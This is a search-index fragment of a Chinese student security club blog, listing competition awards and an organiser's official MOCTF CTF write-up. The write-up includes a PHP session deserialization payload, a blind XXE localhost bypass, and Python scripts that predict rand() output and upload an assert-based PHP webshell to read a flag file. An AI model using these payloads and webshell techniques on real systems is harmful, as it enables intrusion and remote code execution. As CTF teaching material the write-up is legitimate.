360\u96c6\u56e2\u4f5c\u4e3a\u4e2d\u56fd\u9886\u5148\u7684\u4e92\u8054\u7f51\u7edc\u5b89\u5168\u4f01\u4e1a\uff0c\u6c47\u805a\u4e86\u56fd\u5185\u89c4\u6a21\u9886\u5148\u7684\u9ad8\u6c34\u5e73\u5b89\u5168\u6280\u672f\u56e2\u961f\uff0c\u79ef\u7d2f\u4e86\u63a5\u8fd1\u4e07\u4ef6\u539f\u521b\u6280\u672f\u548c\u6838\u5fc3\u6280\u672f\u7684\u4e13\u5229\uff0c\u5e76\u5728\u6b64\u57fa\u7840\u4e0a\u5f00\u53d1\u51fa\u62e5\u6709\u6570\u4ebf\u7528\u6237\u7684360\u5b89\u5168\u536b\u58eb\u3001360\u624b\u673a\u536b\u58eb\u7b49\u5b89\u5168\u4ea7\u54c1\uff0c\u540c\u65f6\u4e3a\u4e0a\u767e\u4e07\u5bb6\u56fd\u5bb6\u673a\u5173\u548c\u4f01\u4e8b\u4e1a\u5355\u4f4d\u63d0\u4f9b\u5305\u62ec\u5b89\u5168\u54a8\u8be2\u3001\u5b89\u5168\u8fd0\u7ef4\u3001\u5b89\u5168\u57f9\u8bad\u7b49\u5168\u65b9\u4f4d\u5b89\u5168\u670d\u52a1\u3002
\u6000\u63e3\u7528\u6237\u5b89\u5168\u7b2c\u4e00\u7684\u76ee\u7684\u548c\u51b3\u5fc3\uff0c48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u9080\u8bf7\u5230\u9ad8\u6821\u5b66\u751f\u5bf9\u6307\u5b9a\u4ea7\u54c1\u8fdb\u884c\u5168\u9762\u6f0f\u6d1e\u6316\u6398\uff0c\u8003\u9a8c\u7684\u4e0d\u4ec5\u4ec5\u662f\u4e66\u672c\u4e0a\u7684\u77e5\u8bc6\uff0c\u8fd8\u6709\u4e2a\u4eba\u7684\u6280\u672f\u5b9e\u529b\u4e0e\u56e2\u961f\u7684\u534f\u540c\u914d\u5408\u3002\u6bd4\u8d5b\u4e00\u65b9\u9762\u53ef\u4ee5\u63d0\u5347360\u4ea7\u54c1\u7684\u5b89\u5168\u6027\uff0c\u53e6\u4e00\u65b9\u9762\u5219\u80fd\u4fc3\u8fdb\u65b0\u751f\u4ee3\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u4ea4\u6d41\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u4ece\u4e1a\u8005\u7684\u6280\u672f\u6c34\u5e73\uff0c\u5171\u540c\u6253\u9020\u66f4\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/","title":"\u4e3e\u529e\u7b2c\u4e00\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b
\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u6bd4\u8d5b\u6d77\u62a5\uff1a
\u6bd4\u8d5b\u73b0\u573a\uff1a
\u6bd4\u8d5b\u6392\u884c\u699c\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e8c\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d
\u3002
\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster
\u6218\u961f\u5168\u7701\u7b2c\u516d\u593a\u5f97\u4e8c\u7b49\u5956
\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u6bd4\u8d5b\u73b0\u573a\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_2","title":"\u6bd4\u8d5b\u89c6\u9891","text":"\u6bd4\u8d5b\u89c6\u9891\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/86e69101-77f4-484a-ba0e-2957afabbdb6/","title":"2018 \u5b89\u6052\u201c\u897f\u6e56\u8bba\u5251\u676f\u201d\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e2a\u4eba\u8d5b\u4e09\u7b49\u5956","text":"\u7531\u56fd\u5bb6\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u7f51\u7edc\u5b89\u5168\u534f\u8c03\u5c40\u3001\u516c\u5b89\u90e8\u7f51\u7edc\u5b89\u5168\u4fdd\u536b\u5c40\u6307\u5bfc\uff0c\u6d59\u6c5f\u7701\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u3001\u6d59\u6c5f\u7701\u516c\u5b89\u5385\u3001\u676d\u5dde\u5e02\u4eba\u6c11\u653f\u5e9c\u4e3b\u529e\uff0c\u676d\u5dde\u5e02\u7ecf\u6d4e\u548c\u4fe1\u606f\u5316\u59d4\u5458\u4f1a\u3001\u676d\u5dde\u5e02\u8427\u5c71\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u676d\u5dde\u5b89\u6052\u4fe1\u606f\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u627f\u529e\uff0c\u676d\u5dde\u5e02\u6ee8\u6c5f\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u3001\u56fd\u5bb6\u5de5\u4e1a\u4fe1\u606f\u5b89\u5168\u53d1\u5c55\u7814\u7a76\u4e2d\u5fc3\u3001\u56fd\u5bb6\u8ba1\u7b97\u673a\u7f51\u7edc\u5e94\u6025\u6280\u672f\u5904\u7406\u534f\u8c03\u4e2d\u5fc3\u3001\u963f\u91cc\u4e91\u8ba1\u7b97\u6709\u9650\u516c\u53f8\u3001\u676d\u5dde\u6d77\u5eb7\u5a01\u89c6\u6570\u5b57\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u6d59\u6c5f\u5927\u534e\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u8054\u5408\u627f\u529e\u7684\u897f\u6e56\u8bba\u5251\u2022\u7f51\u7edc\u5b89\u5168\u5927\u4f1a
\u5b9a\u6863\u4eca\u5e744\u670827\u65e5\uff0c\u897f\u6e56\u8bba\u5251\u676f
\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4f5c\u4e3a\u672c\u6b21\u8bba\u575b\u4e2d\u6700\u53d7\u77a9\u76ee\u7684\u90e8\u5206\u4e4b\u4e00\uff0c\u4e5f\u5c06\u4e8e4\u670826\u65e5\u5f00\u542f\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/","title":"2018 \u7b2c\u5341\u4e00\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956\uff08\u534e\u4e1c\u5357\u8d5b\u533a\u7b2c4\u540d\uff09","text":"\u81ea\u5df1\u53bb\u770b\u5427 http://www.ciscn.cn/home
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/","title":"\u4e3e\u529e2018MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b","text":"\u4ece\u653e\u5047\u5230\u73b0\u5728\u7b79\u529e\u51c6\u5907\u4e86\u63a5\u8fd1\u4e24\u4e2a\u661f\u671f\u7684MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b\u7ec8\u4e8e\u843d\u5e55\u5566\uff0c\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e00\u5171\u51fa\u4e861\u7b7e\u5230+1MISC+3WEB\uff0c\u4e0b\u9762\u5148\u653e\u5b98\u65b9WriteUp\uff08\u54c7\u7ec8\u4e8e\u80fd\u5f53\u4e00\u56de\u5b98\u65b9\u4e86\uff09
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_1","title":"\u7b7e\u5230","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#20","title":"\u7b7e\u5230 20","text":"\u652f\u4ed8\u5b9d\u4eca\u5e74\u96c6\u9f50\u4e94\u798f\u80fd\u4e00\u8d77\u5e73\u5206\u591a\u5c11\u94b1\uff1f\nflag\u683c\u5f0f\uff1amoctf{\u6570\u5b57}\n
flag:moctf{500000000}
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#misc","title":"MISC","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#word-100","title":"\u7a7aword 100","text":"\u771f\u7684\u4ec0\u4e48\u90fd\u6ca1\u6709\u5417\n
\u6587\u4ef6\u662f\u4e2aword \u6253\u5f00\u770b\u53d1\u73b0\u4e00\u4e9b\u5947\u602a\u7684\u6362\u884c\u548ctab \u5f88\u5bb9\u6613\u60f3\u5230\u662f\u6469\u65af\u5bc6\u7801\uff0c\u66ff\u6362\u540e\u5f97\u5230
-.... -.. -.... ..-. -.... ...-- --... ....- -.... -.... --... -... ....- ..--- -.... -.-. ...-- ....- -.... . -.... -... ..... ..-. ...-- ----- --... ..--- ..... ..-. --... ....- -.... .---- -.... ..--- ...-- ..-. --... -..\n
\u89e3\u6469\u65af\u5bc6\u7801\uff0c\u7136\u540ehex\u8f6c\u5b57\u7b26\u4e32\u5f97\u5230flag
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#web","title":"WEB","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#300","title":"\u767b\u5f55\u4e00\u54c8 300","text":"\u767b\u5f55\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053\u3002\nhttp://111.230.32.124:6001/\n
\u6e90\u7801\u653e\u5230git\u91cc\u6cc4\u9732\u7ed9\u5927\u5bb6\u4e86 index.php
<?php\n ini_set('session.serialize_handler', 'php_binary');\n session_start();\n\n if(isset($_POST['username']) && isset($_POST['password'])){\n $username = $_POST['username'];\n $password = $_POST['password'];\n $_SESSION[\"username\"] = $username;\n header(\"Location:./index.php\");\n }\n else if(isset($_SESSION[\"username\"])){\n echo '<h1>hello '.$_SESSION[\"username\"].'</h1>';\n }\n else ...\n
flag.php
<?php\nsession_start();\nclass MOCTF{\n public $flag;\n public $name;\n function __destruct(){\n $this->flag = \"moctf{xxxxxxxxxxxxxxxx}\";\n if($this->flag == $this->name){\n echo \"Wow,this is flag:\".$this->flag;\n }\n }\n}\n
\u770b\u6e90\u7801\u5c31\u53ef\u4ee5\u77e5\u9053\u8fd9\u9053\u9898\u8003\u67e5\u7684\u662fsession\u53cd\u5e8f\u5217\u6f0f\u6d1e\u4e86 \u5728index.php\u4e2dphp\u7684\u5e8f\u5217\u5316handler\u662f\u2019php_binary\u2019\uff0c\u800cflag.php\u91cc\u6ca1\u6709\u8bbe\u7f6e\uff0c\u5c31\u662f\u9ed8\u8ba4\u7684\u2019php\u2019
ini_set('session.serialize_handler', 'php_binary');\n
\u53c2\u8003https://blog.spoock.com/2016/10/16/php-serialize-problem/ index.php\u4e2d\u7684$_session['username']
\u53ef\u63a7\uff0c\u6211\u4eec\u5c31\u80fd\u6784\u9020payload\u5230session\uff0c \u7136\u540e\u8bbf\u95eeflag.php\u9875\u9762\u5c31\u80fd\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u6267\u884c__destruct
\u4e86\uff0c \u8fd9\u91cc\u8fd8\u6709\u4e2a\u8003\u70b9\u662f$this->flag == $this->name
\uff0c\u901a\u8fc7\u5f15\u7528\u7684\u65b9\u5f0f\u7ed5\u8fc7\u3002 \u6784\u9020payload
$a = new MOCTF();\n$a->name = &$a->flag;\necho '|'.serialize($a);\n
|O:5:\"MOCTF\":2:{s:4:\"flag\";N;s:4:\"name\";R:2;}\n
\u63d0\u4ea4\u5230index.php\u7684username\uff0c\u7136\u540e\u8bbf\u95eeflag.php\u5c31\u5f97\u5230flag\u4e86
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400","title":"\u5b57\u7b26\u4e32\u68c0\u67e5 400","text":"\u6765\u68c0\u67e5\u4e00\u4e0b\u4f60\u7684\u5b57\u7b26\u4e32\u662f\u5426\u683c\u5f0f\u826f\u597d\u5427\uff01\nhttp://111.230.32.124:6002/\n
\u539f\u610f\u662fxxe\u6f0f\u6d1e\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6 \u540e\u6765\u77e5\u9053\u5e08\u5085\u4eec\u5361\u4e86\u5f88\u4e45\u8c8c\u4f3c\u662f\u56e0\u4e3aclient-ip
\u7684\u539f\u56e0\uff0c\u6211\u7684\u9505 \u9898\u76ee\u6253\u5f00\u662f\u4e2ajson\u5b57\u7b26\u4e32\u9a8c\u8bc1\u7684\u9875\u9762\uff0cPOST\u5305\u7684Content-Type
\u5b57\u6bb5\u662fapplication/json
\uff0c POST\u540e\u63a5\u53e3\u4f1a\u8fd4\u56dejson\u683c\u5f0f\u6b63\u786e\u6216\u9519\u8bef\u7684\u7ed3\u679c \u6539\u6210application/xml
\uff0c\u63a5\u53e3\u63d0\u793a\u53ea\u5141\u8bb8\u672c\u673a\u8bbf\u95ee\uff0c\u4e8e\u662f\u6784\u9020
client-ip:localhost\n
\u7136\u540e\u5c31\u662fxxe\u76f2\u6253\u6f0f\u6d1e\u4e86\uff0c\u53c2\u8003https://security.tencent.com/index.php/blog/msg/69 \u8fd9\u91cc\u6211\u53ea\u9650\u5236\u4e86payload\u957f\u5ea6\u4e3a170\u4ee5\u5185\uff0c\u5176\u5b9e\u5b8c\u5168\u53ef\u4ee5\u66f4\u77ed\u7684\uff0c\u5e0c\u671b\u5927\u4f6c\u4eec\u53ef\u4ee5\u6d4b\u8bd5\u6d4b\u8bd5 \u6700\u540eflag\u5728/etc/passwd
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400_1","title":"\u7b80\u5355\u5ba1\u8ba1 400","text":"\u4ee3\u7801\u90fd\u7ed9\u4f60\u4e86\uff0c\u8fd8\u8bf4\u4e0d\u4f1a\u505a\uff1f\nhttp://120.78.57.208:6005/\n
index.php
<?php\nerror_reporting(0);\ninclude('config.php');\nheader(\"Content-type:text/html;charset=utf-8\");\nfunction get_rand_code($l = 6) {\n $result = '';\n while($l--) {\n $result .= chr(rand(ord('a'), ord('z')));\n }\n return $result;\n}\n\nfunction test_rand_code() {\n $ip=$_SERVER['REMOTE_ADDR'];\n $code=get_rand_code();\n $socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n @socket_connect($socket, $ip, 8888);\n @socket_write($socket, $code.PHP_EOL);\n @socket_close($socket);\n die('test ok!');\n}\n\nfunction upload($filename, $content,$savepath) {\n $AllowedExt = array('bmp','gif','jpeg','jpg','png');\n if(!is_array($filename)) {\n $filename = explode('.', $filename);\n }\n if(!in_array(strtolower($filename[count($filename)-1]),$AllowedExt)){\n die('error ext!');\n }\n $code=get_rand_code();\n $finalname=$filename[0].'moctf'.$code.\".\".end($filename);\n file_put_contents(\"$savepath\".$finalname, $content);\n usleep(3000000);\n unlink(\"$savepath\".$finalname);\n die('upload over!');\n}\n\n$savepath=\"uploads/\".sha1($_SERVER['REMOTE_ADDR']).\"/\";\nif(!is_dir($savepath)){\n $oldmask = umask(0);\n mkdir($savepath, 0777);\n umask($oldmask);\n}\nif(isset($_GET['action']))\n{\n $act=$_GET['action'];\n if($act==='upload')\n {\n $filename=$_POST['filename'];\n if(!is_array($filename)) {\n $filename = explode('.', $filename);\n }\n $content=$_POST['content'];\n waf($content);\n upload($filename,$content,$savepath);\n }\n else if($act==='test')\n {\n test_rand_code();\n }\n}\nelse {\n highlight_file('index.php');\n}\n?>\n
\u89e3\u91ca\u4e00\u4e0b\u9898\u76ee\u7684\u610f\u601d \u6839\u636eaction\u6267\u884c\u5bf9\u5e94\u64cd\u4f5c\uff0caction=test
\u4f1a\u8c03\u7528test_rand_code
\u51fd\u6570\u53d1\u9001tcp\u5305\u5230\u8bbf\u5ba2\u7684ip action=upload
\u65f6\u4f1a\u5199\u5165\u4e00\u4e2a\u6587\u4ef6\uff0c\u6587\u4ef6\u5185\u5bb9\u6709waf\u62e6\u622a\uff0c\u6587\u4ef6\u540d\u6709\u767d\u540d\u5355\u9650\u5236\u540e\u7f00\uff0c \u7136\u540e\u62fc\u63a5\u6587\u4ef6\u540d\u52a0\u5165rand\u7684\u5b57\u7b26\u4e32\uff0c\u5199\u5165\u6587\u4ef6\uff0c\u6587\u4ef6\u5199\u5165\u540e\u8fc73\u79d2unlink\u5220\u9664 \u6709\u95ee\u9898\u7684\u70b9\u6709\u8fd9\u51e0\u4e2a 1.filename\u68c0\u67e5\u662f\u7528$filename[count($filename)-1]
\u53d6\u7684\u540e\u7f00\uff0c\u662f\u6309\u7167\u4e0b\u6807\u53d6\u7684\uff0c\u800c\u5199\u5165\u6587\u4ef6\u65f6\u7528\u7684\u662fend($filename)
\uff0c\u662f\u53d6\u6700\u540e\u4e00\u4e2a\u5143\u7d20\uff0c\u53ea\u8981post\u65f6\u63d0\u4ea4filename[1]=jpg&filename[0]=php
\u5c31\u80fd\u7ed5\u8fc7\u4e86 2.$content\u7684waf\u7ed5\u8fc7\uff0c \u7ed5\u8fc7\u5373\u53ef 3.\u4f7f\u7528rand()\u751f\u6210\u968f\u673a\u6570\uff0c\u53ef\u4ee5\u88ab\u9884\u6d4b\uff0c\u53c2\u8003https://www.sjoerdlangkemper.nl/2016/02/11/cracking-php-rand/
\u9884\u671f\u89e3\u6cd5\u662f 1.username\u6570\u7ec4bypass\u540e\u7f00\u68c0\u67e5\uff0c\u7ed5\u8fc7content\u7684waf 2.rand\u968f\u673a\u6570\u9884\u6d4b+\u7206\u7834\u6587\u4ef6\u540d \u5728unlink\u4e4b\u524d\u8bbf\u95eeshell \u7ed3\u679c\u5927\u4f6c\u4eec\u76f4\u63a5\u975e\u9884\u671f\u89e3bypass\u4e86unlink
\u6253\u6270\u4e86 \u975e\u9884\u671f\u89e3\u53c2\u8003\u4e00\u53f6\u98d8\u96f6\u5e08\u5085\u7684WriteUp \u9884\u671f\u89e3\u5982\u4e0b \u5199\u4e24\u4e2a\u811a\u672c\uff0c listen.py
#\u76d1\u542c8888\u7aef\u53e3\uff0c\u63a5\u53d76\u4e2a`get_rand_code`\u7684\u7ed3\u679c\uff0c\u7136\u540e\u9884\u6d4b\u63a5\u4e0b\u6765\u4e00\u6b21`get_rand_code`\u7684\u7ed3\u679c\uff0c\u8fd9\u91cc\u53ef\u80fd\u4e0d\u4f1a\u5f88\u51c6\u786e\uff0c\n#\u6240\u4ee5\u9700\u8981\u5c0f\u5e45\u5ea6\u7206\u7834\uff0c\u590d\u6742\u5ea6\u5927\u6982\u4e3a3^6\uff0c\u53cd\u6b63\u5c31\u8dd1\u7740\u5457\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\nfrom socket import * \nfrom time import ctime \nimport random\nimport itertools as its\nimport hashlib\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/\"\n\n\ndef get_rand_list():\n HOST = '' \n PORT = 8888\n BUFSIZ = 128 \n ADDR = (HOST, PORT) \n tcpSerSock = socket(AF_INET, SOCK_STREAM)\n tcpSerSock.bind(ADDR)\n tcpSerSock.listen(5)\n rand_num=0\n l=[]\n while True:\n tcpCliSock, addr = tcpSerSock.accept() \n while True: \n data = tcpCliSock.recv(BUFSIZ) \n if not data: \n break \n data=data[0:6]\n print data,l\n for i in data:\n l.append(ord(i)+1-ord('a'))\n rand_num+=1\n if rand_num==6:\n break\n tcpCliSock.close() \n tcpSerSock.close()\n return l\n\ndef get_salt(l):\n salt=\"\"\n for i in range(6):\n j=len(l)\n r=(l[j-3]+l[j-31])-1\n if r>26:\n r-=26\n #print l[j-3],chr(l[j-3]+ord('a')-1),l[j-31],chr(l[j-31]+ord('a')-1),r,chr(r+ord('a')-1)\n l.append(r)\n salt+=chr(r+ord('a')-1)\n #print salt\n return salt\n\ndef get_flag(salt):\n s=hashlib.sha1('119.23.73.3').hexdigest()\n url1=url+'/uploads/'+s+'/'+'moctf'+salt+'.php'\n data={\"a\":\"system('cat ../../flag.php');echo '666666';\"}\n r2=r.post(url1,data=data)\n print salt\n if '404' not in r2.text:\n print r2.text\n\nget_flag('aaaaaa')\nl=get_rand_list()\nsalt=get_salt(l)\ns=0\nfor i in range(100000):\n s=s+1\nprint s\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n s=\"\".join(i)\n salt2=\"\"\n for j in range(6):\n salt2+=chr(ord(salt[j])-int(s[j]))\n get_flag(salt2)\nwords = 
\"10\"\no=its.product(words,repeat=6)\nfor i in o:\n s=\"\".join(i)\n salt2=\"\"\n for j in range(6):\n salt2+=chr(ord(salt[j])+int(s[j]))\n get_flag(salt2)\n
put.py
#\u901a\u8fc7`?action=test`\u8c03\u7528`test_rand_code`\u51fd\u6570\u53d1\u90016\u6b21`get_rand_code`\u7ed3\u679c\uff0c\u4e00\u517136\u4e2a\u5b57\u7b26\uff0c\n#\u7136\u540e\u63d0\u4ea4\u4e00\u4e2a\u6784\u9020\u597d\u7684`?action=test`\uff0c\u4e0a\u4f20shell\u5230\u670d\u52a1\u5668\uff0c\u5728\u88ab\u5220\u9664\u4e4b\u524d\u5c31\u4f1a\u88ablisten\u7206\u7834\u5f97\u5230\uff0c\u6ca1\u7206\u7834\u5230\u5c31\u591a\u7206\u7834\u51e0\u6b21\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/?action=\"\n\n\ndef get_test():\n url2=url+\"test\"\n r1=r.get(url2)\n print url2\n print r1.text\ndef upload():\n data={\"filename[4]\":\"jpg\",\n \"filename[2]\":\"jpg\",\n \"filename[1]\":\"php\",\n \"content\":\"<script language='php'>assert($_POST[a]);</script>\",\n \"a\":\"system('cat ../../flag.php');\"\n }\n url1=url+\"upload\"\n r2=r.post(url1,data=data)\n print r2.text\n\nfor i in range(6):\n get_test()\nupload()\n
\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_2","title":"\u611f\u60f3","text":"\u8bb2\u4e00\u4e0b\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e3b\u8981\u5e72\u4e86\u90a3\u4e9b\u4e8b\u5427
\u51fa\u9898\uff0c\u5982\u4e0a\u6240\u8ff0 \u5e73\u53f0\u642d\u5efa\uff0c\u7528\u7684\u662fctfd\uff0cdocker\u7684\u65b9\u5f0f\u642d\u5efa\u7684\uff0c\u7701\u4e86\u5f88\u591a\u4e8b \u9898\u76ee\u90e8\u7f72\uff0c\u9664\u4e86ping\u90a3\u9898\uff0c\u5176\u4ed6\u7684web\u90fd\u662f\u6211\u90e8\u7f72\u7684\uff0c\u5c24\u5176\u662fcms\u90a3\u9898\uff0c\u53cd\u590d\u90e8\u7f72\u7684\u6709\u70b9\u5410\uff0c\u4e2d\u95f4\u6709\u4e2a\u96c6\u5927\u5b66\u5f1f\u6765\u5e2e\u5fd9\uff0c\u540e\u9762\u6bd4\u8d5b\u7684\u65f6\u5019\u8fd8\u662f\u51fa\u4e86\u95ee\u9898 \u53d1\u5e03\u9898\u76ee\uff0cemmmmmmmmmm\uff0c\u7528ctfd\u7684\u65f6\u5019\u51fa\u73b0\u4e86\u5f88\u795e\u5947\u7684\u60c5\u51b5\uff0c\u5728\u7f16\u8f91config\u7684\u65f6\u5019\u4f7f\u7528\u8c37\u6b4c\u7684\u81ea\u52a8\u7ffb\u8bd1\uff0c\u4fdd\u5b58\u4e4b\u540ectfd\u7684web\u670d\u52a1\u5c31\u6302\u6389\u5566\uff01\u662f\u4e2a\u5de8\u5751\uff0c\u73b0\u5728\u8fd8\u4e0d\u77e5\u9053\u548b\u56de\u4e8b \u6bd4\u8d5b\u65f6\u5019\u7684\u653e\u9898\uff0c\u653ehint\uff0c\u8fd0\u7ef4\uff0c\u6c34\u7fa4\uff0c\u54c8\u54c8\u54c8\u54c8\u548c\u5927\u4f6c\u4eec\u73a9\u800d\u8fd8\u662f\u5f88\u5f00\u5fc3\u7684 \u653e\u4e00\u4e9b\u540e\u53f0\u6570\u636e \u539f\u6765\u53ea\u662f\u60f3\u7ed9\u6211\u4eec\u5b66\u6821\u548c\u96c6\u5927\u7684\u5b66\u5f1f\u4eec\u4f53\u9a8c\u6bd4\u8d5b\u7684\uff0c\u4e0d\u8fc7\u5bf9\u5916\u5f00\u653e\u4e5f\u5438\u5f15\u4e86\u8bb8\u591a\u5e08\u5085\u4eec\u6765\u505a\u9898\uff0c\u867d\u7136\u8fd0\u7ef4\u5f97\u5f88\u7d2f\uff0c\u4f46\u4e5f\u5b66\u5230\u4e86\u5f88\u591a\u4e1c\u897f\uff08\u4e3b\u8981\u662f\u975e\u9884\u671f\u548c\u90e8\u7f72\u5404\u79cd\u5947\u8469\u73af\u5883\uff09 \u6253\u4e00\u6ce2\u5e7f\u544a\uff0chttp://www.moctf.com/ 
